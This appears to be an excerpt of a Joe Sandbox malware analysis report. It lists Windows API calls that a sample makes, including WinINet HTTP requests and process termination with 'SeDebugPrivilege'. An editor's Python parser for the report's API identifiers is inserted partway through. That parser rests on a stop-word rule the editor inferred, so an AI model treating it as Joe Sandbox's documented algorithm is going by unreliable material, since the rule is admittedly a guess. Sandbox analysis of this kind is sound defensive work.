• SetMenu.USER32(?,00000000), ref: 00DF45E7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF466F
• IsMenu.USER32(?), ref: 00DF4683
• CreatePopupMenu.USER32 ref: 00DF468D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF46BA
• DrawMenuBar.USER32 ref: 00DF46C2
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: 48019585f2c1a952d7cfbb423e9bb00f8470114731fd49acb111d1498af41422
• Instruction ID: bb2d07e02b93990ac5aec1d04d0ab0bc8ca1fa88120d3c770b103e6fc439ff17
• Opcode Fuzzy Hash: 48019585f2c1a952d7cfbb423e9bb00f8470114731fd49acb111d1498af41422
• Instruction Fuzzy Hash: 69414774601309EFDB14CF65D854AEA7BB6FF4A314F198028FA45EB350D730A924CB60
APIs
  • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
  • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DC27F4
• GetDlgCtrlID.USER32 ref: 00DC27FF
• GetParent.USER32 ref: 00DC281B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC281E
• GetDlgCtrlID.USER32(?), ref: 00DC2827
• GetParent.USER32(?), ref: 00DC283B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC283E
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 78300b49c70293ecc902ba5d6c63a0f9bf6f2536cb78e47c6126bfab951b1a0d
• Instruction ID: a90e929b20cccceaee71754d4c512be8d5defb5bfa1f732801cb9e42d7956cf4
• Opcode Fuzzy Hash: 78300b49c70293ecc902ba5d6c63a0f9bf6f2536cb78e47c6126bfab951b1a0d
• Instruction Fuzzy Hash: 2721B075900219BBCF11EBA0CC95EFEBBB6EF09320B10415AB991E72A1CB748844DB70
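Each function entry above pairs an "APIs" call list with a Similarity "API ID" (for example "ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess" for the SafeArray/Variant routine, or "MessageSend$CtrlParent$ClassName_wcslen" for the ComboBox/ListBox routine). The Python below is an editor's added example, not code from Joe Sandbox or from the analyzed sample: it parses the "APIs" lines exactly as they are printed in this report (subcall entries included), rebuilds that identifier, and converts each "ref" address to an offset inside the dumped image using the "Offset: 00D60000" value from the Memory Dump Source entries. The camel-case split and the stop-word list are an assumption inferred from the identifiers on this page; the rule reproduces every API ID in this section, but it is not Joe Sandbox's documented algorithm. The sample text is constructed from the entries above.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: two "APIs" blocks copied from the report entries above.
SAMPLE_REPORT = """\
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DC033F
• SafeArrayAllocData.OLEAUT32(?), ref: 00DC0398
• VariantInit.OLEAUT32(?), ref: 00DC03AA
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00DC03CA
• VariantCopy.OLEAUT32(?,?), ref: 00DC041D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00DC0431
• VariantClear.OLEAUT32(?), ref: 00DC0446
• SafeArrayDestroyData.OLEAUT32(?), ref: 00DC0453
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC045C
• VariantClear.OLEAUT32(?), ref: 00DC046E
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC0479
APIs
  • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
  • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DC27F4
• GetDlgCtrlID.USER32 ref: 00DC27FF
• GetParent.USER32 ref: 00DC281B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC281E
• GetDlgCtrlID.USER32(?), ref: 00DC2827
• GetParent.USER32(?), ref: 00DC283B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC283E
"""

# Image base taken from "Offset: 00D60000" in the Memory Dump Source entries.
IMAGE_BASE = 0x00D60000

# ASSUMPTION: tokens Joe Sandbox appears to drop before building the API ID.
# Inferred from the API IDs printed in this report section, not documented.
STOP_TOKENS = {"Get", "Set", "Co", "SH", "Mem", "For", "ID", "W",
               "Ex", "Dlg", "Def", "Is", "Bar", "To"}

# One report line: optional subcall prefix, Api.MODULE, optional (args), ", ref: ADDR".
ENTRY = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                      # virtual address of the call site
    subcall_of: Optional[int]     # address of the callee when listed as a subcall


def parse_report(text: str) -> list:
    """Split report text into one list of ApiCall per 'APIs' section."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = ENTRY.match(line)
        if not m or not functions:
            continue               # headings, hashes, dump paths: ignore
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        functions[-1].append(ApiCall(
            m["api"], m["mod"], args, int(m["ref"], 16),
            int(m["sub"], 16) if m["sub"] else None))
    return functions


def split_camel(name: str) -> list:
    """'SHGetPathFromIDListW' -> ['SH','Get','Path','From','ID','List','W']; '_wcslen' stays whole."""
    return re.findall(r"_[a-z0-9]+|[A-Z]+(?![a-z])|[A-Z][a-z0-9]*", name)


def api_id(calls: list) -> str:
    """Rebuild the Similarity 'API ID': tokens bucketed by frequency (descending),
    sorted ASCII-wise inside each bucket, buckets joined with '$'."""
    counts = Counter(t for c in calls for t in split_camel(c.api)
                     if t not in STOP_TOKENS)
    buckets = {}
    for tok, n in counts.items():
        buckets.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(buckets[n])) for n in sorted(buckets, reverse=True))


def image_offset(call: ApiCall, image_base: int = IMAGE_BASE) -> int:
    """Offset of the call site inside the dumped PE image (for matching a static disassembly)."""
    return call.ref - image_base


if __name__ == "__main__":
    for calls in parse_report(SAMPLE_REPORT):
        print(api_id(calls), len(calls), "calls, first at image offset",
              hex(image_offset(calls[0])))
```

Running the block prints the two identifiers that the report lists for these routines; feeding it a different function's "APIs" block and comparing the result with the report's own "API ID" is a quick way to check whether the same stop-word rule still holds, and the image offsets let the call sites be located in a static copy of the same module.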
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00DC28D3
                                                                                              • GetDlgCtrlID.USER32 ref: 00DC28DE
                                                                                              • GetParent.USER32 ref: 00DC28FA
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC28FD
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00DC2906
                                                                                              • GetParent.USER32(?), ref: 00DC291A
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC291D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 711023334-1403004172
                                                                                              • Opcode ID: 5d03c68ca21b0287e4e4f0106b1f90fca46c0465152a16ddf09284c29fe24a68
                                                                                              • Instruction ID: 415b51047a1c5610feb81fa77178b6f76e8a31a58fedf1104b7405345b06a9ff
                                                                                              • Opcode Fuzzy Hash: 5d03c68ca21b0287e4e4f0106b1f90fca46c0465152a16ddf09284c29fe24a68
                                                                                              • Instruction Fuzzy Hash: B521B075900219BBCF11ABA0DC45EFEBBB9EF05310F10801AB991E7295DB748845DB70
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DF43FC
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DF43FF
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00DF4426
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DF4449
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DF44C1
                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DF450B
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DF4526
                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DF4541
                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DF4555
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DF4572
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: 5004cc71fc834e138099cdde20bb966e72e13eac942c5bcc555d496bce290b9f
                                                                                              • Instruction ID: f1ed1258627d1b95d501a09fda78de123230863ba3205092354761201c0ce433
                                                                                              • Opcode Fuzzy Hash: 5004cc71fc834e138099cdde20bb966e72e13eac942c5bcc555d496bce290b9f
                                                                                              • Instruction Fuzzy Hash: 06617875900208AFDB11DFA8CC81EFE77B8EB49310F148169FA54AB3A1D770AA45DF60
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DDCBCF
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DDCBF7
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DDCC27
                                                                                              • GetLastError.KERNEL32 ref: 00DDCC7F
                                                                                              • SetEvent.KERNEL32(?), ref: 00DDCC93
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00DDCC9E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: e5e8cb9b17bed628a19c16cef3fe3f02bb438706190135a73004623c5d82611a
                                                                                              • Instruction ID: 39d361db702ef434269f8ce3a4b9c0dc87c8ff4c574f7ce25726fbd1a024af9d
                                                                                              • Opcode Fuzzy Hash: e5e8cb9b17bed628a19c16cef3fe3f02bb438706190135a73004623c5d82611a
                                                                                              • Instruction Fuzzy Hash: B8319AB1620305AFDB21AF698D88ABB7BFEEB09744F14551AE54AD6300DB30D904DBB0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DA5437,?,?,Bad directive syntax error,00DFDCD0,00000000,00000010,?,?), ref: 00DCA14B
                                                                                              • LoadStringW.USER32(00000000,?,00DA5437,?), ref: 00DCA152
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DCA216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 858772685-4153970271
                                                                                              • Opcode ID: ab6ed27da50199b2414c7a3e7aebc46f1b2a2e428a225404213efd7e9daf5c53
                                                                                              • Instruction ID: a8688a1b4ca318235cc8c8b53ef6781e043687b7df65ad1961595485bef98f35
                                                                                              • Opcode Fuzzy Hash: ab6ed27da50199b2414c7a3e7aebc46f1b2a2e428a225404213efd7e9daf5c53
                                                                                              • Instruction Fuzzy Hash: 3A212E3290031EAFCF11EF94DC46EEE7776FF18318F044459B516A60A2DA719A58DB31
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00DC293B
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00DC2950
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DC29DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1290815626-3381328864
                                                                                              • Opcode ID: a579cdfc0aca8a98899232b1c8af17038ab5c3ad304d2696679c8ea2c229d47c
                                                                                              • Instruction ID: 6cfe8a1eae6fb9ee4c6f9e02578cb36329cf66080e35b00c8a762b95367d6e54
                                                                                              • Opcode Fuzzy Hash: a579cdfc0aca8a98899232b1c8af17038ab5c3ad304d2696679c8ea2c229d47c
                                                                                              • Instruction Fuzzy Hash: 9611A07628831BBAFA003620EC07EF6779DDF05730F20412AFA41E61D1EE71A9419A74
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DDCADF
                                                                                              • GetLastError.KERNEL32 ref: 00DDCAF2
                                                                                              • SetEvent.KERNEL32(?), ref: 00DDCB06
                                                                                                • Part of subcall function 00DDCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DDCBCF
                                                                                                • Part of subcall function 00DDCBB0: GetLastError.KERNEL32 ref: 00DDCC7F
                                                                                                • Part of subcall function 00DDCBB0: SetEvent.KERNEL32(?), ref: 00DDCC93
                                                                                                • Part of subcall function 00DDCBB0: InternetCloseHandle.WININET(00000000), ref: 00DDCC9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 337547030-0
                                                                                              • Opcode ID: 9a5dfe86037498e86ca8fe7f4c4db3e8212f193ef1af8391a249f41984c27104
                                                                                              • Instruction ID: dd95a05111688a73970aee621e488045aa5e835591ec21f179ba03406b364fa9
                                                                                              • Opcode Fuzzy Hash: 9a5dfe86037498e86ca8fe7f4c4db3e8212f193ef1af8391a249f41984c27104
                                                                                              • Instruction Fuzzy Hash: 99314671210706AFDB219F61CD45A76BBEAFF08300F15941FA99AC6710DB30E814EBB0
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC209C
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20A3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DC1CD9,?,?,00000000), ref: 00DC20B8
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20C0
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20C3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DC1CD9,?,?,00000000), ref: 00DC20D3
                                                                                              • GetCurrentProcess.KERNEL32(00DC1CD9,00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20DB
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00DC1CD9,?,?,00000000), ref: 00DC20DE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00DC2104,00000000,00000000,00000000), ref: 00DC20F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 73352884c8f1463946dc4ea04c7ac635dd78814043abbe397f9bb5595e10fab9
                                                                                              • Instruction ID: 6eb724f871e35ff0555003eb3e74ddbb61a3f1c214c60ca5f9e9ba5c5c7672ee
                                                                                              • Opcode Fuzzy Hash: 73352884c8f1463946dc4ea04c7ac635dd78814043abbe397f9bb5595e10fab9
                                                                                              • Instruction Fuzzy Hash: F801CDB5240308BFE710AFA5DC4DF6B3BAEEB89711F008411FA05DB2A1CA709810CB30
                                                                                              APIs
                                                                                                • Part of subcall function 00DCDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00DCDCC1
                                                                                                • Part of subcall function 00DCDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00DCDCCF
                                                                                                • Part of subcall function 00DCDC9C: CloseHandle.KERNELBASE(00000000), ref: 00DCDD9C
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DEAACC
                                                                                              • GetLastError.KERNEL32 ref: 00DEAADF
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DEAB12
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DEABC7
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00DEABD2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DEAC23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: d7aa101c618a3f4028cfbbe020d47488b026047666117a986f26554e5bb43c4c
                                                                                              • Instruction ID: 6e0aab8d125b70ce0d0aaa2152ed682d9c309dc6ac7f4d84b8b54545581ce598
                                                                                              • Opcode Fuzzy Hash: d7aa101c618a3f4028cfbbe020d47488b026047666117a986f26554e5bb43c4c
                                                                                              • Instruction Fuzzy Hash: 81618D342082429FD310EF19C594F26BBE6AF54318F19849CE46A8B7A2C775FD45CBB2
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DF4284
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DF4299
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DF42B3
                                                                                              • _wcslen.LIBCMT ref: 00DF42F8
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DF4325
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DF4353
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 2147712094-78025650
                                                                                              • Opcode ID: a22defd22f5ffa1f28bdb13a5dbc2ef0fcd7f36c581cef884402f47b31b9c59c
                                                                                              • Instruction ID: 6bfaa0bae548cdcb3d9888b46ad14fa8402a8f48547fc4e0f12db8a69657dcb4
                                                                                              • Opcode Fuzzy Hash: a22defd22f5ffa1f28bdb13a5dbc2ef0fcd7f36c581cef884402f47b31b9c59c
                                                                                              • Instruction Fuzzy Hash: 3841913190031CABEB219F64CC45BFB7BA9EF08350F154526FA54E7291D7719990CBA4
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCC5D9
                                                                                              • IsMenu.USER32(00000000), ref: 00DCC5F9
                                                                                              • CreatePopupMenu.USER32 ref: 00DCC62F
                                                                                              • GetMenuItemCount.USER32(018565D0), ref: 00DCC680
                                                                                              • InsertMenuItemW.USER32(018565D0,?,00000001,00000030), ref: 00DCC6A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: 904f96722c78e1f528fc8f4f3bb2936089493fbbbb286f13bcdc760700f8c7aa
                                                                                              • Instruction ID: 517afb7ae2884e23c3760ef5370aa3225ea42384ab45b3835e7e961b49430601
                                                                                              • Opcode Fuzzy Hash: 904f96722c78e1f528fc8f4f3bb2936089493fbbbb286f13bcdc760700f8c7aa
